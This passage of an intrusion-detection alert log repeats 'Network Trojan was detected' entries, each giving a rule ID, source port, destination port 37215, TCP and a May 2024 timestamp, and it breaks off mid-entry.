          SID:2835222
          Source Port:56182
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.225915
          SID:2835222
          Source Port:39512
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.879158
          SID:2829579
          Source Port:54604
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.781268
          SID:2835222
          Source Port:50578
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.982880
          SID:2835222
          Source Port:46632
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.168408
          SID:2835222
          Source Port:47020
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.711076
          SID:2835222
          Source Port:52912
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.163805
          SID:2829579
          Source Port:49510
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.974908
          SID:2835222
          Source Port:34908
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.476466
          SID:2835222
          Source Port:42218
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.046767
          SID:2835222
          Source Port:42692
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.305149
          SID:2835222
          Source Port:53402
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.817609
          SID:2835222
          Source Port:36944
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.175804
          SID:2835222
          Source Port:57836
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.702619
          SID:2829579
          Source Port:36756
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.795239
          SID:2835222
          Source Port:41406
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.300887
          SID:2829579
          Source Port:59254
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.965146
          SID:2829579
          Source Port:59406
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.772153
          SID:2829579
          Source Port:41808
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.849286
          SID:2829579
          Source Port:34642
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.208414
          SID:2835222
          Source Port:57970
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.805053
          SID:2829579
          Source Port:47206
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.466316
          SID:2829579
          Source Port:49732
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.214838
          SID:2829579
          Source Port:53876
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.849146
          SID:2829579
          Source Port:57188
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.207109
          SID:2835222
          Source Port:58802
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.527824
          SID:2835222
          Source Port:46552
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.724200
          SID:2829579
          Source Port:51254
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.840480
          SID:2835222
          Source Port:59618
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.298351
          SID:2835222
          Source Port:33346
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.698503
          SID:2835222
          Source Port:48582
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.201598
          SID:2829579
          Source Port:33160
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.248823
          SID:2829579
          Source Port:54434
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.318820
          SID:2829579
          Source Port:42682
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.922483
          SID:2829579
          Source Port:44938
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.351094
          SID:2835222
          Source Port:60472
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.891691
          SID:2829579
          Source Port:44324
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.233082
          SID:2829579
          Source Port:48576
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.247623
          SID:2829579
          Source Port:60576
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.065412
          SID:2835222
          Source Port:43446
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.150771
          SID:2835222
          Source Port:38800
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.551296
          SID:2835222
          Source Port:58792
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.741636
          SID:2835222
          Source Port:51212
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.466561
          SID:2835222
          Source Port:50976
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.818037
          SID:2835222
          Source Port:52978
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.123650
          SID:2835222
          Source Port:58800
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.244710
          SID:2829579
          Source Port:40866
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.942281
          SID:2835222
          Source Port:36462
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.650266
          SID:2835222
          Source Port:58990
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.651195
          SID:2835222
          Source Port:42766
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.266702
          SID:2829579
          Source Port:37276
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.492666
          SID:2835222
          Source Port:40866
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.483716
          SID:2829579
          Source Port:46944
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.764466
          SID:2829579
          Source Port:42600
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.337203
          SID:2835222
          Source Port:47986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.849442
          SID:2829579
          Source Port:43196
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.681226
          SID:2835222
          Source Port:42368
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.932175
          SID:2835222
          Source Port:55622
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.339632
          SID:2835222
          Source Port:46300
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.061838
          SID:2835222
          Source Port:43136
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.126658
          SID:2835222
          Source Port:44768
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.217686
          SID:2829579
          Source Port:40964
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.478273
          SID:2835222
          Source Port:35558
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.210417
          SID:2835222
          Source Port:39898
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.219605
          SID:2829579
          Source Port:40410
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.592993
          SID:2829579
          Source Port:51576
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.168178
          SID:2829579
          Source Port:38272
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.941717
          SID:2835222
          Source Port:37874
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.848322
          SID:2835222
          Source Port:46320
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.291536
          SID:2835222
          Source Port:34708
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.214447
          SID:2835222
          Source Port:56124
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.323954
          SID:2829579
          Source Port:44708
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.325347
          SID:2829579
          Source Port:53240
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.842137
          SID:2829579
          Source Port:53746
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.890997
          SID:2829579
          Source Port:59590
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.928009
          SID:2835222
          Source Port:42826
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.548559
          SID:2835222
          Source Port:50276
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.527080
          SID:2835222
          Source Port:46746
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.671973
          SID:2829579
          Source Port:50080
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.048655
          SID:2829579
          Source Port:59538
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.609598
          SID:2829579
          Source Port:55632
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.876637
          SID:2835222
          Source Port:37896
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.273521
          SID:2829579
          Source Port:47042
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.051212
          SID:2835222
          Source Port:49300
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.938619
          SID:2829579
          Source Port:55674
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.484643
          SID:2829579
          Source Port:40924
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.848378
          SID:2829579
          Source Port:50066
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.651451
          SID:2829579
          Source Port:53572
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.435449
          SID:2835222
          Source Port:45982
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.710096
          SID:2829579
          Source Port:51128
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.782222
          SID:2835222
          Source Port:33642
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.136874
          SID:2829579
          Source Port:49598
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.356209
          SID:2829579
          Source Port:45304
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.465283
          SID:2835222
          Source Port:46182
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.813052
          SID:2829579
          Source Port:42258
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.150866
          SID:2829579
          Source Port:57014
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.594328
          SID:2829579
          Source Port:37938
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.182560
          SID:2835222
          Source Port:35588
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.231713
          SID:2835222
          Source Port:58872
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.843272
          SID:2835222
          Source Port:33914
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.231688
          SID:2829579
          Source Port:47798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.329067
          SID:2835222
          Source Port:33108
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.240591
          SID:2835222
          Source Port:37168
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.141427
          SID:2835222
          Source Port:60770
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.879324
          SID:2829579
          Source Port:34606
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.328814
          SID:2835222
          Source Port:37072
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.664673
          SID:2835222
          Source Port:37652
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.530227
          SID:2835222
          Source Port:58642
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.107194
          SID:2835222
          Source Port:58864
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.535584
          SID:2835222
          Source Port:47138
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.591276
          SID:2829579
          Source Port:47176
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.273197
          SID:2829579
          Source Port:44220
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.334159
          SID:2829579
          Source Port:40312
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.796225
          SID:2829579
          Source Port:37348
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.877966
          SID:2835222
          Source Port:38512
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.707733
          SID:2835222
          Source Port:47570
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.780392
          SID:2835222
          Source Port:55434
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.265950
          SID:2829579
          Source Port:41412
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.063199
          SID:2835222
          Source Port:44266
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.707777
          SID:2829579
          Source Port:47726
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.959917
          SID:2835222
          Source Port:54164
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.114605
          SID:2829579
          Source Port:54380
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.551290
          SID:2829579
          Source Port:48128
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.949574
          SID:2829579
          Source Port:43502
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.927782
          SID:2829579
          Source Port:59284
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.471201
          SID:2835222
          Source Port:47932
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.941029
          SID:2829579
          Source Port:49832
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.332384
          SID:2829579
          Source Port:56104
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.547840
          SID:2829579
          Source Port:54182
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.401371
          SID:2829579
          Source Port:42248
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.588795
          SID:2835222
          Source Port:56188
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.810657
          SID:2829579
          Source Port:52434
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.821168
          SID:2829579
          Source Port:33134
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.868832
          SID:2829579
          Source Port:52110
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.267084
          SID:2829579
          Source Port:33988
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.472607
          SID:2829579
          Source Port:44930
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.201227
          SID:2829579
          Source Port:33736
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.284883
          SID:2829579
          Source Port:51874
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.486805
          SID:2835222
          Source Port:47150
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.594488
          SID:2829579
          Source Port:57114
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.123725
          SID:2835222
          Source Port:39482
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.998786
          SID:2835222
          Source Port:33412
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.593127
          SID:2835222
          Source Port:58410
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.849234
          SID:2835222
          Source Port:47794
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.878750
          SID:2835222
          Source Port:34254
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.242818
          SID:2835222
          Source Port:54790
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.273250
          SID:2829579
          Source Port:56968
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.178969
          SID:2835222
          Source Port:50452
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.841458
          SID:2829579
          Source Port:54870
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.324081
          SID:2835222
          Source Port:39316
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.923495
          SID:2835222
          Source Port:34718
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.551567
          SID:2835222
          Source Port:58722
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.465337
          SID:2829579
          Source Port:48868
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.710615
          SID:2835222
          Source Port:49318
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.464123
          SID:2835222
          Source Port:46024
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.737353
          SID:2835222
          Source Port:37240
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.609582
          SID:2829579
          Source Port:58828
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.593350
          SID:2829579
          Source Port:51698
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.348711
          SID:2835222
          Source Port:53274
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.301192
          SID:2835222
          Source Port:55734
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.841566
          SID:2835222
          Source Port:59536
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.819437
          SID:2835222
          Source Port:33810
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.126674
          SID:2829579
          Source Port:48686
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.161973
          SID:2835222
          Source Port:36768
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.187230
          SID:2835222
          Source Port:59060
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.373239
          SID:2829579
          Source Port:36798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.711311
          SID:2835222
          Source Port:39338
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.160529
          SID:2835222
          Source Port:40228
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.671753
          SID:2829579
          Source Port:34940
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.125551
          SID:2829579
          Source Port:47828
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.464007
          SID:2835222
          Source Port:45642
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.744373
          SID:2835222
          Source Port:59776
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.176455
          SID:2835222
          Source Port:39590
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.132913
          SID:2835222
          Source Port:37766
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.677489
          SID:2835222
          Source Port:33238
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.214293
          SID:2829579
          Source Port:52852
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.526495
          SID:2835222
          Source Port:43384
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.337404
          SID:2835222
          Source Port:33878
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.551104
          SID:2835222
          Source Port:38798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.075724
          SID:2835222
          Source Port:46436
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.103288
          SID:2829579
          Source Port:38648
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.858993
          SID:2829579
          Source Port:50906
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.848431
          SID:2835222
          Source Port:54080
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.959101
          SID:2829579
          Source Port:58818
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.802714
          SID:2829579
          Source Port:54208
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.994844
          SID:2829579
          Source Port:43618
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.358123
          SID:2829579
          Source Port:47662
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.497238
          SID:2829579
          Source Port:56944
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.112189
          SID:2835222
          Source Port:50662
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.839363
          SID:2829579
          Source Port:49022
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.169804
          SID:2835222
          Source Port:59360
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.103154
          SID:2835222
          Source Port:56992
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.333340
          SID:2835222
          Source Port:33036
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.525457
          SID:2829579
          Source Port:58786
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.848665
          SID:2835222
          Source Port:39386
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.222500
          SID:2835222
          Source Port:38630
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.846955
          SID:2835222
          Source Port:59570
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.725098
          SID:2835222
          Source Port:42474
          Destination Port:37215
